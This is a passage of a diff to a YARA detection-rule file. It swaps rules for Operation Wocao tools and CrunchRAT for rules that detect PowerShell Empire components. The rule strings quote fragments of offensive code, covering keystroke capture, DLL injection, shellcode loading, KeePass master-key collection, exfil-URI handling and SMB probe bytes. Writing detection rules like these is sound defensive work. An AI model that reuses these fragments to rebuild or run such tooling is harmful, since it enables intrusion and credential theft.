-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L157-L168"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L275-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "640c9e52f3cf3df4e954177624e6fba4bab80a2c9442b718fe90e8577dafbbd6"
+		logic_hash = "74602d1c4986e6392df8845e0ed713499aa3b93c64e9d68e95f9dbaf60fe4299"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
 
 	strings:
-		$encfile = "New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($encfile)"
+		$s1 = "# upload to a specified exfil URI" fullword ascii
+		$s2 = "Server path to exfil to." fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x490a and filesize < 2KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Injector_Bin
+rule SIGNATURE_BASE_Empire_Invoke_Smbautobrute : FILE
 {
 	meta:
-		description = "Process injector/launcher"
-		author = "Fox-IT SRT"
-		id = "389279f1-6531-594f-97b6-5adbc8fa4d3d"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L170-L193"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L291-L305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8cd4e3c87c6d80b39069f7a94e512e3f7b739c21f6fd70c2a79829c5a04f32f"
+		logic_hash = "dd87a5d3a710017953c8c19862e4daee25de0e57175cab8246eea6d067fcb4d1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
 
 	strings:
-		$a = "%s{%04d-%02d%02d-%02d%02d-%d%ld}.tmp"
-		$b = "s% > s% c/ exe.d"
-		$c = {
-            48 89 5C 24 08 48 89 74  24 10 57 48 83 EC 50 48
-            8B 71 08 48 8D 59 10 48  8B F9 48 8B CB FF 17 33
-            C9 48 8D 47 78 48 89 44  24 48 4C 8D 87 9C 03 00
-            00 48 89 5C 24 40 48 8D  97 90 00 00 00 4C 89 44
-            24 38 45 33 C9 48 89 4C  24 30 45 33 C0 89 4C 24
-            28 C7 44 24 20 01 00 00  00 66 89 4B 40 FF D6 48
-            8B 5C 24 60 33 C0 48 8B  74 24 68 48 83 C4 50 5F
-            C3
-        }
+		$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
+		$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Timeliner_Bin
+rule SIGNATURE_BASE_Empire_Get_Keystrokes : FILE
 {
 	meta:
-		description = "Timeliner utility"
-		author = "Fox-IT SRT"
-		id = "3d81a4ae-0ce0-5867-ac93-a706556481b6"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Get-Keystrokes.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L195-L213"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L307-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3a8cddc34134faaab93ee0df0086604e4a7b031530dd65e2e8dab705483305b"
+		logic_hash = "710e1bbf517c6683bd3082786e605cb8e6a52460f9c96609610e5ab38800dc79"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
 
 	strings:
-		$a = "[+] Work completed." ascii wide
-		$b = "[-] Create a new file failed." ascii wide
-		$c = "[-] This is not a correct path." ascii wide
-		$d = "%s [TargetPath] <Num> <SavePath>" ascii wide
-		$e = "D\t%ld\t%ld\t%ld\t%d\t%d\t%s\t" ascii wide
-		$f = "D\t%ld\t%ld\t%ld\t-1\t%d\t%s\t" ascii wide
-		$g = "%s\t%ld\t%ld\t%ld\t%I64d\t%d\t%s\t%s" ascii wide
+		$s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Checkadmin_Bin
+rule SIGNATURE_BASE_Empire_Invoke_Dllinjection : FILE
 {
 	meta:
-		description = "Checkadmin utility"
-		author = "Fox-IT SRT"
-		id = "2f819213-ade1-525b-af18-d77b7fc96093"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-DllInjection.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L215-L232"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L322-L335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "784ec960ce2733aebc404ee5c09bb852eb45553ad167db292d05b82feedbd5a6"
+		logic_hash = "450ca96dd7c80275d7e4eaf07a7229e27530c373b8d79af5be8f4a741daef448"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
 
 	strings:
-		$a = "[-] %s * A system error has occurred: %d" ascii wide
-		$b = {
-            0D 00 0A 00 25 00 6C 00 64 00 20 00 72 00 65 00
-            73 00 75 00 6C 00 74 00 73 00 2E 00 0D 00 0A 00
-        }
-		$c = "%s\t<Access denied>" ascii wide
+		$s1 = "-Dll evil.dll" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Getos_Py
+rule SIGNATURE_BASE_Empire_Keepassconfig : FILE
 {
 	meta:
-		description = "Python getos utility"
-		author = "Fox-IT SRT"
-		id = "4a731dde-87e4-566a-b559-d23e0bef5841"
-		date = "2019-12-20"
+		description = "Detects Empire component - file KeePassConfig.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L234-L295"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L337-L350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2535c01b703c0fcba43e771832db8cd969e4a4b112ef28e4ddfeac6491ba604c"
+		logic_hash = "044c8a326ee6cc74a918e6c28100032bfd2fb396ddab8683ab11e00f9370ab2a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$smb_1 = {
-            00 00 00 85 ff 53 4d 42 72 00 00 00 00 18 53 c8
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
-            00 00 ff b4 00 62 00 02 50 43 20 4e 45 54 57 4f
-            52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02
-            4c 41 4e 4d 41 4e 31 2e 30 00 02 57 69 6e 64 6f
-            77 73 20 66 6f 72 20 57 6f 72 6b 67 72 6f 75 70
-            73 20 33 2e 31 61 00 02 4c 4d 31 2e 32 58 30 30
-            32 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 02 4e 54
-            20 4c 4d 20 30 2e 31 32 00
-        }
-		$smb_2 = {
-            00 00 00 c8 ff 53 4d 42 73 00 00 00 00 18 03 c8
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
-            00 00 3f b5 0c ff 00 c8 00 04 11 32 00 00 00 00
-            00 00 00 28 00 00 00 00 00 d4 00 00 a0 8d 00 4e
-            54 4c 4d 53 53 50 00 01 00 00 00 07 82 88 a2 00
-            00 00 00 28 00 00 00 00 00 00 00 28 00 00 00 05
-            01 28 0a 00 00 00 0f 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-            00 00 00 00 00 00 00 00 00 00 00 00
-        }
-		$smbstr_1 = "\\x00\\x00\\x00\\x85\\xffSMBr\\x00\\x00\\x00\\x00\\x18S\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00\\xff\\xb4\\x00b\\x00\\x02PC NETWORK PROGRAM 1.0\\x00\\x02LANMAN1.0\\x00\\x02Windows for Workgroups 3.1a\\x00\\x02LM1.2X002\\x00\\x02LANMAN2.1\\x00\\x02NT LM 0.12\\x00"
-		$smbstr_2 = "\\x00\\x00\\x00\\xc8\\xffSMBs\\x00\\x00\\x00\\x00\\x18\\x03\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00?\\xb5\\x0c\\xff\\x00\\xc8\\x00\\x04\\x112\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\xd4\\x00\\x00\\xa0\\x8d\\x00NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x07\\x82\\x88\\xa2\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x05\\x01(\\n\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
-		$code_1 = "return 'Other error.'" ascii wide
-		$code_2 = "sblob = buf[47:47 + sbl]" ascii wide
-		$code_3 = "re.split('[\\x00-,]+', y[-4])" ascii wide
-		$code_4 = "('').join(sblob[off:off + hlen].split('\\x00'))" ascii wide
-		$code_5 = "banner = '%s    %s' % (hostname, native)" ascii wide
-		$code_6 = "banner = '%s\\\\%s    %s' % (dm, hostname, native)" ascii wide
-		$tsk_1 = "PushTask" ascii wide
-		$tsk_2 = "parse_task" ascii wide
-		$tsk_3 = "commit_task" ascii wide
-		$str_1 = "Usage: getos.py <ip-range|ip-file>" ascii wide
-		$str_2 = "The path '%s' write fails." ascii wide
-		$str_3 = "Receive a signal %d," ascii wide
-		$str_4 = "Scan Complete!" ascii wide
-		$str_5 = "line: %d, %s: %s" ascii wide
-		$str_6 = "Other error." ascii wide
+		$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
 
 	condition:
-		( all of ( $smb_* ) ) or ( all of ( $smbstr_* ) ) or ( 3 of ( $code_* ) ) or ( all of ( $tsk_* ) ) or ( 3 of ( $str_* ) )
+		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Info_Vbs
+rule SIGNATURE_BASE_Empire_Invoke_Sshcommand : FILE
 {
 	meta:
-		description = "Strings from the information grabber VBS"
-		author = "Fox-IT SRT"
-		id = "b719fb31-2836-5faf-a7c8-c361a14df2be"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-SSHCommand.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L297-L316"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L352-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e37f8768c7920b8c3d9fdd6bb3a4e748c47a6c06a8aaed01655355ef3d8c3457"
+		logic_hash = "3749c3d58335cb08bff66fe3126fc4977261576a9fbedbd7da673e3921364850"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
 
 	strings:
-		$ = "Logger PingConnect"
-		$ = "Logger GetAdmins"
-		$ = "Logger InstallPro"
-		$ = "Logger Exec"
-		$ = "retstr = adminsName & \" Members\" & vbCrLf & _"
-		$ = "Logger VolumeName & \" (\" & objDrive.DriveLetter & \":)\" _"
-		$ = "txtRes = txtRes & machine & \" can"
-		$ = "retstr = \"PID   SID Image Name\" & vbCrLf & \"===="
+		$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
+		$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
+		$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Console_Jsp
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen1 : FILE
 {
 	meta:
-		description = "Strings from the console.jsp webshell"
-		author = "Fox-IT SRT"
-		id = "1afdfc34-d2e3-58c7-80ea-ee5632e42469"
-		date = "2019-12-20"
+		description = "Detects Empire component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L318-L335"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L371-L390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e70c15ef10b63a011edbcedc773a8e2917fd915c3ecc273c3bf2b78eb10fc570"
+		logic_hash = "074423d30c5ef419d1ca9433477d8a896086cec84eb939270ce51d3965b6b1a2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$a = "String strLogo = request.getParameter(\"image\")"
-		$b = "!strLogo.equals(\"web.gif\")"
-		$c = "<font color=red>Save Failed!</font>"
-		$d = "<font color=red>Save Success!</font>"
-		$e = "Save path:<br><input type=text"
-		$f = "if (newfile.exists() && newfile.length()>0) { out.println"
+		$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
+		$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Index_Jsp
+rule SIGNATURE_BASE_Empire_Powerup_Gen : FILE
 {
 	meta:
-		description = "Strings from the index.jsp socket tunnel"
-		author = "Fox-IT SRT"
-		id = "9c226ccd-6c69-523c-bca4-371e55274667"
-		date = "2019-12-20"
+		description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L337-L353"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L392-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "870dad9fb5456f8edbd9f3c2d0b8764cf1143399626ce4df53c93919bcb1a0cb"
+		logic_hash = "4086b057b46cac85bb871d2d4363d4ae4c99a160e5c9625e4d41e3df55fece2d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
 
 	strings:
-		$x1 = "X-CMD"
-		$x2 = "X-STATUS"
-		$x3 = "X-TARGET"
-		$x4 = "X-ERROR"
-		$a = "out.print(\"All seems fine.\");"
+		$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
+		$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
 
 	condition:
-		all of ( $x* ) and $a
+		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Ver_Jsp
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen2 : FILE
 {
 	meta:
-		description = "Strings from the ver.jsp webshell"
-		author = "Fox-IT SRT"
-		id = "b2828b84-8934-5111-9345-683a07025070"
-		date = "2019-12-20"
+		description = "Detects Empire component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L355-L372"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L409-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ada6de4b07a76e79bb17793cda2b51f96554a35992a73f59c360487638ae3be3"
+		logic_hash = "e3cb63d0c3278ee4d04cb4b1d6ebe817fb3da97d25e2581f95bd43ecd5142b30"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$a = "String strLogo = request.getParameter(\"id\")"
-		$b = "!strLogo.equals(\"256\")"
-		$c = "boolean chkos = msg.startsWith"
-		$d = "while((c = er.read()) != -1)"
-		$e = "out.print((char)c);}in.close()"
-		$f = "out.print((char)c);}er.close()"
+		$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
+		$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Webinfo
+rule SIGNATURE_BASE_Empire_Agent_Gen : FILE
 {
 	meta:
-		description = "Generic strings from webinfo.war webshells"
-		author = "Fox-IT SRT"
-		id = "b8477f62-f3f6-5526-b0e3-9b794fefaa1f"
-		date = "2019-12-20"
+		description = "Detects Empire component - from files agent.ps1, agent.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L374-L394"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L430-L447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "711737a56067f24f422cc7d5aeba4389741fe18a0e66f2715fce626c3b6aef19"
+		logic_hash = "ed8aee7ac6c1d93b21cc1aa5c3c18df1566692c63a010715a3aae65e18fffa60"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
+		hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
 
 	strings:
-		$var1 = "String strLogo = request.getParameter"
-		$var2 = "String content = request.getParameter(\"content\");"
-		$var3 = "String basePath=request.getScheme()"
-		$var4 = "!strLogo.equals("
-		$var5 = "if(path!=null && !path.equals(\"\") && content!=null"
-		$var6 = "File newfile=new File(path);"
-		$str1 = "Save Success!"
-		$str2 = "Save Failed!"
+		$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
+		$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
+		$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
 
 	condition:
-		2 of ( $var* ) or ( all of ( $str* ) and 1 of ( $var* ) )
+		( uint16( 0 ) == 0x660a and filesize < 100KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Crunchrat : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen3 : FILE
 {
 	meta:
-		description = "Detects CrunchRAT - file CrunchRAT.exe"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da7d9b5c-6ccc-5960-9daa-4df612545751"
-		date = "2017-11-03"
+		id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/t3ntman/CrunchRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crunchrat.yar#L2-L23"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L449-L467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e29cfe6dd2ca69b1a8cd0cb36f7513dd9befd392906225196991dc62fcc80870"
+		logic_hash = "933fe27c54e90806a21082b4d2e4cbb3491374e48834a64c0d6a520c537d145e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "58a07e96497745b6fd5075d569f17b0254c3e50b0234744e0487f7c5dddf7161"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$x1 = "----CrunchRAT" fullword wide
-		$x2 = "\\Debug\\CrunchRAT" ascii
-		$x3 = "\\Release\\CrunchRAT" ascii
-		$s1 = "runCommand" fullword ascii
-		$s2 = "<action>download<action>" fullword wide
-		$s3 = "Content-Disposition: form-data; name=action" fullword wide
-		$s4 = "<action>upload<action>" fullword wide
-		$s5 = "/update.php" fullword wide
+		$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
+		$s2 = "remote DLL injection" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and 3 of them )
